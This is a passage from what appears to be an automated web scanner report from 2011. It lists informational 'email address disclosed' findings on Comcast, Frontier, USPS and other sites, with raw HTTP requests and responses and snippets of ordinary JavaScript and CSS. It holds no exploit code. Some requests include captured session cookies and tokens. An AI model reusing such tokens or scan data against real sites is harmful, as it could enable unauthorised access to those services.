<a href="mailto:comcast_move@cable.comcast.com" id="ctl00__column2CPH_ContactMovers__emailLnk" title="E-mail Movers Edge">
...[SNIP]...

18.19. https://www.comcastsupport.com/ChatEntry/js/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ChatEntry/js/jquery.cookie.js HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 4295
Content-Type: text/javascript
Content-Location: http://www.comcastsupport.com/ChatEntry/js/jquery.cookie.js
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:46 GMT

.../**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function (name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

18.20. https://www.comcastsupport.com/ChatEntry/js/jquery.jqprint.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/js/jquery.jqprint.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ChatEntry/js/jquery.jqprint.js HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 2619
Content-Type: text/javascript
Content-Location: http://www.comcastsupport.com/ChatEntry/js/jquery.jqprint.js
Last-Modified: Tue, 19 Jul 2011 15:03:30 GMT
Accept-Ranges: bytes
ETag: "08d1652546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:51 GMT

...// -----------------------------------------------------------------------
// Eros Fratini - eros@recoding.it
// jqprint 0.3
//
// - 19/06/2009 - some new implementations, added Opera support
// - 11/05/2009 - first sketch
//
// Printing plug-in for jQuery, evolution of jPrintArea: http://plugins.jquery
...[SNIP]...

18.21. https://www.comcastsupport.com/ChatEntry/js/jquery.mb.menu/mbMenu.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/js/jquery.mb.menu/mbMenu.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ChatEntry/js/jquery.mb.menu/mbMenu.js HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 22272
Content-Type: text/javascript
Content-Location: http://www.comcastsupport.com/ChatEntry/js/jquery.mb.menu/mbMenu.js
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:39 GMT

/*******************************************************************************
jquery.mb.components
Copyright (c) 2001-2010. Matteo Bicocchi (Pupunzi); Open lab srl, Firenze - Italy
email: info@pupunzi.com
site: http://pupunzi.com

Licences: MIT, GPL
http://www.opensource.org/licenses/mit-license.php
http://www.gnu.org/licenses/gpl.html
**************************************************************
...[SNIP]...

18.22. https://www.comcastsupport.com/ChatEntry/js/plugins/jquery.hoverIntent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/js/plugins/jquery.hoverIntent.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ChatEntry/js/plugins/jquery.hoverIntent.js HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 4952
Content-Type: text/javascript
Content-Location: http://www.comcastsupport.com/ChatEntry/js/plugins/jquery.hoverIntent.js
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:39 GMT

.../*******************************************************************************
jquery.mb.components
Copyright (c) 2001-2010. Matteo Bicocchi (Pupunzi); Open lab srl, Firenze - Italy
email: info@pupunzi.com
site: http://pupunzi.com

Licences: MIT, GPL
http://www.opensource.org/licenses/mit-license.php
http://www.gnu.org/licenses/gpl.html
**************************************************************
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

18.23. https://www.comcastsupport.com/ChatEntry/js/plugins/jquery.metadata.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/js/plugins/jquery.metadata.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ChatEntry/js/plugins/jquery.metadata.js HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://www.comcastsupport.com/chatentry/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 3992
Content-Type: text/javascript
Content-Location: http://www.comcastsupport.com/ChatEntry/js/plugins/jquery.metadata.js
Last-Modified: Tue, 19 Jul 2011 15:03:32 GMT
Accept-Ranges: bytes
ETag: "0ba4762546cc1:1675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:28:39 GMT

/*******************************************************************************
jquery.mb.components
Copyright (c) 2001-2010. Matteo Bicocchi (Pupunzi); Open lab srl, Firenze - Italy
email: info@pupunzi.com
site: http://pupunzi.com

Licences: MIT, GPL
http://www.opensource.org/licenses/mit-license.php
http://www.gnu.org/licenses/gpl.html
**************************************************************
...[SNIP]...

18.24. http://www.fairpoint.com/scripts/jquery/plugins/selectToUISlider.jQuery.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /scripts/jquery/plugins/selectToUISlider.jQuery.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery/plugins/selectToUISlider.jQuery.js HTTP/1.1
Host: www.fairpoint.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:56:23 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Accept-Ranges: bytes
ETag: W/"8560-1314312615000"
Last-Modified: Thu, 25 Aug 2011 22:50:15 GMT
Content-Length: 8560
Content-Type: text/javascript

/*
* --------------------------------------------------------------------
* jQuery-Plugin - selectToUISlider - creates a UI slider component from a select element(s)
* by Scott Jehl, scott@filamentgroup.com
* http://www.filamentgroup.com
* reference article: http://www.filamentgroup.com/lab/update_jquery_ui_16_slider_from_a_select_element/
* demo page: http://www.filamentgroup.com/examples/slider_v2/i
...[SNIP]...

18.25. http://www.frontier.com/yahoo/js/CCallWrapper.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/js/CCallWrapper.js

Issue detail

The following email address was disclosed in the response:

Request

GET /yahoo/js/CCallWrapper.js HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.asp?type=biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response

HTTP/1.1 200 OK
Content-Length: 3230
Content-Type: application/x-javascript
Last-Modified: Mon, 12 Jul 2010 20:15:12 GMT
Accept-Ranges: bytes
ETag: "048aeeefe21cb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:29:51 GMT

/*
* CCallWrapper.js
* $Revision: 1.4 $ $Date: 2010/07/12 20:15:12 $
*/

/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject
...[SNIP]...
<bclary@netscape.com>
...[SNIP]...

18.26. http://www.frontierhelp.com/frontiernetnews.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierhelp.com
Path:   /frontiernetnews.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /frontiernetnews.cfm HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://www.frontierhelp.com/techsupport.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; CFID=2324395; CFTOKEN=20838155; s_cc=true; s_sq=cznpeace%3D%2526pid%253DFrontier%252520Peace%252520of%252520Mind%252520%25253A%252520Tech%252520Support%2526pidt%253D1%2526oid%253Dhttp%25253A//www.frontierhelp.com/frontiernetnews.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:51:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<html>


<link rel="icon" href="http://#request.cName#.frontierhelp.com/frontier.ico" type="image/x-icon">
<link rel="shortcut icon" href="http://#request.cName#.frontierhelp.com/frontier.ic
...[SNIP]...
<a href="mailto:support@frontier.com">support@frontier.com</a>
...[SNIP]...

18.27. http://www.frontierhelp.com/func.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierhelp.com
Path:   /func.js

Issue detail

The following email address was disclosed in the response:

Request

GET /func.js HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://www.frontierhelp.com/techsupport.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; CFID=2324395; CFTOKEN=20838155

Response

HTTP/1.1 200 OK
Content-Length: 32426
Content-Type: application/x-javascript
Content-Location: http://www.frontierhelp.com/func.js
Last-Modified: Wed, 01 Apr 2009 16:22:44 GMT
Accept-Ranges: bytes
ETag: "0221d16e6b2c91:b9b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:41 GMT

var newWindow;
var weekend = [0,6];
var weekendColor = "#e0e0e0";
var fontface = "Verdana";
var fontsize = 2;

var gNow = new Date();
var ggWinCal;
isNav = (navigator.appName.indexOf("Netscape
...[SNIP]...
< 3) || !isEmailAddr(formField.value)) )
   {
       alert("Please enter a complete email address in the form: yourname@yourdomain.com");
       formField.focus();
       result = false;
   }

return result;

}

function validNum(formField,fieldLabel,required)
{
   var result = true;

   if (required && !validRequired(formField,fie
...[SNIP]...

18.28. https://www.frontiermobile.com/data/Js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontiermobile.com
Path:   /data/Js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /data/Js/s_code.js HTTP/1.1
Host: www.frontiermobile.com
Connection: keep-alive
Referer: https://www.frontiermobile.com/data/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da933aCMYKM; ASPSESSIONIDSATQTBDS=GGODMNPCPECFKPDLNFBJFLCO; ASP.NET_SessionId=bcv1oo45gbysf4jskjggz355

Response

HTTP/1.1 200 OK
Content-Length: 19002
Content-Type: application/x-javascript
Last-Modified: Sun, 23 May 2010 04:44:16 GMT
Accept-Ranges: bytes
ETag: "7c59a19932faca1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:51:12 GMT

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
//DEV
//var s_account
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

18.29. http://www.frontierpages.com/scripts/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /scripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/s_code.js HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://www.frontierpages.com/region.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallas

Response

HTTP/1.1 200 OK
Content-Length: 17665
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Mar 2010 15:00:18 GMT
Accept-Ranges: bytes
ETag: "0ed9e84fb9ca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:47 GMT

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

//Dev
//var s_account="cznquapages"

//Prod
var s_account="cznpages"
...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

18.30. http://www.myfitv.com/javascripts/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /javascripts/all.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/all.js?1314990512 HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.1.10.1315330191; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Tue, 06 Sep 2011 12:45:30 GMT
ETag: "64fd2-551ae-4abfa1659cc00"-gzip
Last-Modified: Fri, 02 Sep 2011 19:08:32 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 348590

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

18.31. http://www.myfitv.com/javascripts/jquery.hoverIntent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /javascripts/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/jquery.hoverIntent.js HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/portal/recent_tv_elastic
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fitvuser=fitvuser_etiamsodalesorciat; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51eeea0a0e4a1cfca90223f19ea

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Tue, 06 Sep 2011 12:29:50 GMT
ETag: "2a3f8-11aa-4abfa1659cc00"-gzip
Last-Modified: Fri, 02 Sep 2011 19:08:32 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Vary: Accept-Encoding
Content-Length: 4522
Connection: keep-alive

.../**
* hoverIntent is similar to jQuery's built-in "hover" function except that
* instead of firing the onMouseOver event immediately, hoverIntent checks
* to see if the user's mouse has slowed down
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

18.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 19900


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<a href="mailto:customerservice@optionshouse.com">customerservice@optionshouse.com</a>
...[SNIP]...

18.33. https://www.optionshouse.com/tool/2011.09.01.19.07/asset/coreuiConcatMin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/asset/coreuiConcatMin.js

Issue detail

The following email address was disclosed in the response:

Request

GET /tool/2011.09.01.19.07/asset/coreuiConcatMin.js HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:03 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Vary: Accept-Encoding
Accept-Ranges: bytes
Last-Modified: Fri, 02 Sep 2011 00:23:32 GMT
Content-Length: 610876

var Base=function(){};
Base.extend=function(_instance,_static){var extend=Base.prototype.extend;
Base._prototyping=true;
var proto=new this;
extend.call(proto,_instance);
delete Base._prototyping;
var
...[SNIP]...
s("selectedLink")
},handleSelectBoxChange:function(){var smsProviderValue=oh.utils.forms.getValue(this.$smsProviderSelectBox);
if(smsProviderValue=="other"){this.$deliverySMSExampleText.html("Example: 8885551212@otherprovider.com <br/>
...[SNIP]...
oh.utils.validators.email.runTest(smsNumber);
if(!validPhoneNumber||!validSMSFullAddress){isValid=false;
errorOnNumberFieldOnly=true;
this.addErrorPageLevelMessage("Please enter a number in the format 8885551212@otherprovider.com")
}}else{validPhoneNumber=(oh.utils.validators.phone.runTest(smsNumber)&&smsNumber.length==10);
if(!validPhoneNumber){isValid=false;
errorOnNumberFieldOnly=true;
this.addErrorPageLevelMessage("Please
...[SNIP]...

18.34. https://www.usps.com/ContentTemplates/assets/css/components.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/assets/css/components.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/assets/css/components.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "4fe84d33-1-0-b7e9"
Last-Modified: Wed, 29 Jun 2011 15:30:59 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 47081
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:15 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        components.css
       @author            david.milton@akqa.com
       @description    Page layout + global style definitions for the content page individual components
       
       Contents
       0. General layout rules
       1. Navigation
           1a. Sub-nav Menu
           1b. Get-help Menu
...[SNIP]...

18.35. https://www.usps.com/ContentTemplates/assets/css/home.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/assets/css/home.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/assets/css/home.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "bdc749f6-3-0-37c8"
Last-Modified: Fri, 22 Jul 2011 21:00:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 14280
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:15 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        home.css
